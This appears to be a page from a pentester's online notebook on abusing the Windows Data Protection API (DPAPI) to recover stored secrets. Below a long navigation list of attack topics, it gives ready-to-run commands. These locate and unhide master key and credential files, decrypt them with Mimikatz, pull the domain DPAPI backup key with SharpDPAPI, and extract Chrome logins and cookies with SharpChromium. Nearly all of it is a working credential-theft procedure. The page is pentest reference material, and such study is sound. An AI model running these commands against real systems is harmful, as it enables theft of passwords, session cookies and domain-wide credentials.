Pentester's Promiscuous Notebook
Blog
GitHub
Twitter
Search…
README
⚒️ Pentest
C2
Infrastructure
AD
ACL Abuse
AD CS Abuse
ADIDNS Abuse
Attack Trusts
AV / EDR Evasion
Authentication Coercion
Credentials Dump
From Memory
Credential Phishing
DPAPI
KeePass
Linux
LSA
NPLogonNotify
NTDS
Password Filter
RDP
RPC
SAM
DCSync
Delegation Abuse
Discovery
DnsAdmins
Dominance
GPO Abuse
Kerberos
Key Credentials Abuse
LAPS
Lateral Movement
LDAP
NTLM
Password Spraying
Post Exploitation
PrivExchange
Privileges Abuse
RID Cycling
Roasting
SCCM Abuse
SMB
RPC
Token Manipulation
User Hunt
WSUS
Zerologon
DevOps
DBMS
Authentication Brute Force
File Transfer
IPMI
Kiosk Breakout
Low-Hanging Fruits
LPE
Networks
NFS
Persistence
Pivoting
Post Exploitation
SNMP
TFTP
VNC
Misc
OSINT
Password Brute Force
Perimeter
Shells
Web
Wi-Fi
⚔️ Red Team
Basics
Cobalt Strike
Infrastructure
Malware Development
SE
⚙️ Admin
Git
Linux
Networking
Virtualization
Windows
Powered By
GitBook
DPAPI
Data Protection API
https://habr.com/ru/post/434514/
ZN17 - Hunting for Credentials Dumping in Windows Environment (Teymur Kheirkhabarov).pdf
8MB
PDF
Master keys locations (hidden files, need
-Force
):
PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\)
Credential files locations (hidden files, need
-Force
):
PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\)
Unhide files:
PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff
PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff"
Mimikatz
https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
Decrypt manually offline with known plaintext password:
mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd!
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff
SharpDPAPI
https://github.com/GhostPack/SharpDPAPI#table-of-contents
https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpDPAPI.ps1
Triage user's
credentials
,
vaults
,
rdg
and
certificates
:
PS > .\SharpDPAPI.exe triage /password:Passw0rd!
Triage machine's credentials (
machinecredentials
), vaults (
machinevaults
) and certificates (
certificates /machine
):
PS > .\SharpDPAPI.exe machinetriage
Retrieve the domain DPAPI backup key (never changes) from a DC and decrypt master key blobs for any user in the domain with it (needs DA privileges):
PS > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]
PS > .\SharpDPAPI.exe credentials /pvk:key.pvk [/server:PC01.megacorp.local]
SharpChrome
https://github.com/GhostPack/SharpDPAPI#sharpchrome-commands
PS > .\SharpChromium.exe logins|cookies [/pvk:key.pvk]
SharpChromium
https://github.com/djhohnstein/SharpChromium
PS > ls "C:\Users\snovvcrash\AppData\Local\Google\Chrome\User Data\Default"
PS > .\SharpChromium.exe logins
PS > .\SharpChromium.exe cookies
Previous
Credential Phishing
Next
KeePass
Last modified
2mo ago
Copy link
On this page
Mimikatz
SharpDPAPI
SharpChrome
SharpChromium